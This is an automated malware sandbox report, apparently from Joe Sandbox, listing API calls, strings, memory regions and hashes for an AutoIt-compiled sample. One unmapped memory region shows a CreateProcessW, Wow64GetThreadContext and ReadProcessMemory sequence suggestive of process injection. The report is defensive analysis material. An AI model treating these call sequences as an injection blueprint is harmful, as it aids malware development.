  • Part of subcall function 00323041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003230DC
  • Part of subcall function 00323041: LoadIconW.USER32(000000A9), ref: 003230F2
  • Part of subcall function 00323041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00323101
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: a98319bb233da5907eb7279b9dba1a3cc6798c96d7a9049aefe0f3f2faeb8e24
• Instruction ID: 930318ec6a81bdee27139512409f9208c510215542d35c134ba7adde0ebb0dd3
• Opcode Fuzzy Hash: a98319bb233da5907eb7279b9dba1a3cc6798c96d7a9049aefe0f3f2faeb8e24
• Instruction Fuzzy Hash: 05214D70D00354AFEB22DFA4EC89B9D7BB8FB08715F000629E600AA2E1D3B655408F94

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R>
• API String ID: 1825951767-1421681191
• Opcode ID: 79d8154b9923b8beccccc1a2e27d2a16ee1e97924c95b0c02cefcbfdaddfd35f
• Instruction ID: 6c38f60c55c3163be5445f70b8b02ca4ed598437885d6c93ace3760e8d025a7d
• Opcode Fuzzy Hash: 79d8154b9923b8beccccc1a2e27d2a16ee1e97924c95b0c02cefcbfdaddfd35f
• Instruction Fuzzy Hash: 2EA13E7291022DAACB16EBA4EC91EEEB77CFF15310F440529F415BB191DF746A48CBA0

Control-flow Graph

APIs
  • Part of subcall function 00340162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00340193
  • Part of subcall function 00340162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0034019B
  • Part of subcall function 00340162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003401A6
  • Part of subcall function 00340162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003401B1
  • Part of subcall function 00340162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003401B9
  • Part of subcall function 00340162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003401C1
  • Part of subcall function 003360F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0032F930), ref: 00336154
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0032F9CD
• OleInitialize.OLE32(00000000), ref: 0032FA4A
• CloseHandle.KERNEL32(00000000), ref: 003645C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: <W>$\T>$%;$S>
• API String ID: 1986988660-1435292849
• Opcode ID: a7a2d6fd6457e479af4694e33ffd44447a461fe74ea1675eb4f6e1d1ece8ef72
• Instruction ID: 2cdf8dee0c183ce6f77b469461dc7beb25ac156779e47a816b5b8166bc7eb5ab
• Opcode Fuzzy Hash: a7a2d6fd6457e479af4694e33ffd44447a461fe74ea1675eb4f6e1d1ece8ef72
• Instruction Fuzzy Hash: 7B81A1B4905AD4CEC3A7DF2AA9C16597BEDFB5930EF90832A9119CF2E1E77044848F11

Control-flow Graph

APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01239C81
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01239EA7
Memory Dump Source
• Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
• Instruction ID: 578224c3a93981783866bc1cf12cbbfbd78bd78af1749b458ca0a2f83d0c626d
• Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
• Instruction Fuzzy Hash: BFA12CB0E10209EBDF14DF94C859BEEBBB5BF89304F108559E205BB280D7B55A81CF64

Control-flow Graph

APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00323A03
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00323A24
• ShowWindow.USER32(00000000,?,?), ref: 00323A38
• ShowWindow.USER32(00000000,?,?), ref: 00323A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: ee979bcd48ef49b0b7c115d2408c09e17e4663015356e22a3446094f5f82bb8c
• Instruction ID: 82ac63f0fe6ef262c46a82376c3ba5162bf907bb6a0c28fcc2f9fc0795c27e3f
• Opcode Fuzzy Hash: ee979bcd48ef49b0b7c115d2408c09e17e4663015356e22a3446094f5f82bb8c
• Instruction Fuzzy Hash: F6F03A706002D07EEA325763AC88E7B3E7DD7C7F54F00062EBB00AA1B1C2610840CAB0

Control-flow Graph

APIs
  • Part of subcall function 01239860: Sleep.KERNELBASE(000001F4), ref: 01239871
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01239A9C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: 1MR2YTJJIV7S10NZT6PJ4
• API String ID: 2694422964-887113866
• Opcode ID: 6cfdcefd86aaec6cf9a00f12edbff3afeeac702de2479869c17c9b80e47d6c93
• Instruction ID: 721cecf3b287e8f769fe3674c8ed70182e833002ba2fcfc4a48c6146b384a420
• Opcode Fuzzy Hash: 6cfdcefd86aaec6cf9a00f12edbff3afeeac702de2479869c17c9b80e47d6c93
• Instruction Fuzzy Hash: B551C371D1424CDBEF11DBA4C854BEEBB78AF59304F004199E248BB2C0D7B91B85CBA6

Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1491 32407c-324092 1492 324098-3240ad call 327a16 1491->1492 1493 32416f-324173 1491->1493 1496 3240b3-3240d3 call 327bcc 1492->1496 1497 35d3c8-35d3d7 LoadStringW 1492->1497 1499 35d3e2-35d3fa call 327b2e call 326fe3 1496->1499 1501 3240d9-3240dd 1496->1501 1497->1499 1509 3240ed-32416a call 342de0 call 32454e call 342dbc Shell_NotifyIconW call 325904 1499->1509 1513 35d400-35d41e call 327cab call 326fe3 call 327cab 1499->1513 1503 3240e3-3240e8 call 327b2e 1501->1503 1504 324174-32417d call 328047 1501->1504 1503->1509 1504->1509 1509->1493 1513->1509
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0035D3D7
  • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
• _memset.LIBCMT ref: 003240FC
• _wcscpy.LIBCMT ref: 00324150
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00324160
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
• String ID: Line:
• API String ID: 3942752672-1585850449
APIs
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
APIs
  • Part of subcall function 00324DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00324E0F
• _free.LIBCMT ref: 0035E263
• _free.LIBCMT ref: 0035E2AA
  • Part of subcall function 00326A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00326BAD
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 2861923089-1757145024
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003235A1,SwapMouseButtons,00000004,?), ref: 003235D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003235A1,SwapMouseButtons,00000004,?,?,?,?,00322754), ref: 003235F5
• RegCloseKey.KERNELBASE(00000000,?,?,003235A1,SwapMouseButtons,00000004,?,?,?,?,00322754), ref: 00323617
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0123908D
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012390B1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012390D3
Memory Dump Source
• Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
  • Part of subcall function 00324EE5: _fseek.LIBCMT ref: 00324EFD
  • Part of subcall function 00389734: _wcscmp.LIBCMT ref: 00389824
  • Part of subcall function 00389734: _wcscmp.LIBCMT ref: 00389837
• _free.LIBCMT ref: 003896A2
• _free.LIBCMT ref: 003896A9
• _free.LIBCMT ref: 00389714
  • Part of subcall function 00342D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00349A24), ref: 00342D69
  • Part of subcall function 00342D55: GetLastError.KERNEL32(00000000,?,00349A24), ref: 00342D7B
• _free.LIBCMT ref: 0038971C
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
APIs
• _memset.LIBCMT ref: 003244CF
  • Part of subcall function 0032407C: _memset.LIBCMT ref: 003240FC
  • Part of subcall function 0032407C: _wcscpy.LIBCMT ref: 00324150
  • Part of subcall function 0032407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00324160
• KillTimer.USER32(?,00000001,?,?), ref: 00324524
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00324533
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0035D4B9
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: AU3!P/;$EA06
                                                                                                                    • API String ID: 4104443479-888523718
                                                                                                                    • Opcode ID: 6c52e14050744605be922d3a8475293e5be00997a32fe12946fd50bdcf762cea
                                                                                                                    • Instruction ID: f80ecfc9d28dbe21a1b1a9b2aa5050d25e020b824360e862075e1d976dfb4729
                                                                                                                    • Opcode Fuzzy Hash: 6c52e14050744605be922d3a8475293e5be00997a32fe12946fd50bdcf762cea
                                                                                                                    • Instruction Fuzzy Hash: 60414A32A042786BDF239B64F8517BE7FA69B46300F694475EC82DF287D6309D4487A1
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0035EA39
                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0035EA83
                                                                                                                      • Part of subcall function 00324750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00324743,?,?,003237AE,?), ref: 00324770
                                                                                                                      • Part of subcall function 00340791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003407B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 3777226403-3081909835
                                                                                                                    • Opcode ID: 007cd6a23feb92c912d6f721aa3e59a7d3825285216b01c7964c4967fec4f9a6
                                                                                                                    • Instruction ID: 1352edad71a541083aced095669d8e15f8a767c3c9ea30b01bdcea8f19c85da5
                                                                                                                    • Opcode Fuzzy Hash: 007cd6a23feb92c912d6f721aa3e59a7d3825285216b01c7964c4967fec4f9a6
                                                                                                                    • Instruction Fuzzy Hash: 5621D571A002589BCB03DF98D845BEE7BFCAF49314F00401AE908BB241DBB4698D8FA1
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                    • String ID: EA06
                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                    • Opcode ID: 4e8d122725cfca7e1e31ca976203f1fa63418bd55c0db23c4f4f68affe1e7a2d
                                                                                                                    • Instruction ID: 38b37c25508ba0971b14223455d172f7898e980cf222a186aa9476ba9dfb18dd
                                                                                                                    • Opcode Fuzzy Hash: 4e8d122725cfca7e1e31ca976203f1fa63418bd55c0db23c4f4f68affe1e7a2d
                                                                                                                    • Instruction Fuzzy Hash: D201F972D042187FDB19DBA8C816EFEBBF8DB11301F00419BF552D6281E974B6088B60
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 003898F8
                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0038990F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                    • Opcode ID: 7721827d9df8df23e846f712761333fc8a289a9e986b44ca21ca5e4dd3b99e3d
                                                                                                                    • Instruction ID: 280f9000a096fcd0868764dd160e000be9ba91942bf948a3ca07e511f8c7b89f
                                                                                                                    • Opcode Fuzzy Hash: 7721827d9df8df23e846f712761333fc8a289a9e986b44ca21ca5e4dd3b99e3d
                                                                                                                    • Instruction Fuzzy Hash: DCD05E7A54030DAFDB519BE0EC0EFEA773CE704701F0006B1BA94911A1EAB0A5988B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 93ae8b358eb9d6ca2dffcfd65ddd1db29040c8a9a4dad18d7253d25877af3387
                                                                                                                    • Instruction ID: ed2d24fc8fb8d971b604ec69ca2c4e66bad84a38706fd64fe68e3d79806169c0
                                                                                                                    • Opcode Fuzzy Hash: 93ae8b358eb9d6ca2dffcfd65ddd1db29040c8a9a4dad18d7253d25877af3387
                                                                                                                    • Instruction Fuzzy Hash: 44F15A716083019FCB15DF28C481A6ABBE5FF89314F55892EF89A9B352D730E945CF82
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00324370
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00324415
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00324432
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1505330794-0
                                                                                                                    • Opcode ID: 6e3755ab01a7bc9b9e37d3b927063fc74609970ea4649e69fc8440157903e3cc
                                                                                                                    • Instruction ID: f1bcd730f99f101be660d07cb047a818387b099495397784997fdb12b76c1d9b
                                                                                                                    • Opcode Fuzzy Hash: 6e3755ab01a7bc9b9e37d3b927063fc74609970ea4649e69fc8440157903e3cc
                                                                                                                    • Instruction Fuzzy Hash: 033175705047118FD732DF65E88469BBBF8FB49309F000D2EF69A86291D7716944CB52
                                                                                                                    APIs
                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00345733
                                                                                                                      • Part of subcall function 0034A16B: __NMSG_WRITE.LIBCMT ref: 0034A192
                                                                                                                      • Part of subcall function 0034A16B: __NMSG_WRITE.LIBCMT ref: 0034A19C
                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 0034573A
                                                                                                                      • Part of subcall function 0034A1C8: GetModuleFileNameW.KERNEL32(00000000,003E33BA,00000104,?,00000001,00000000), ref: 0034A25A
                                                                                                                      • Part of subcall function 0034A1C8: ___crtMessageBoxW.LIBCMT ref: 0034A308
                                                                                                                      • Part of subcall function 0034309F: ___crtCorExitProcess.LIBCMT ref: 003430A5
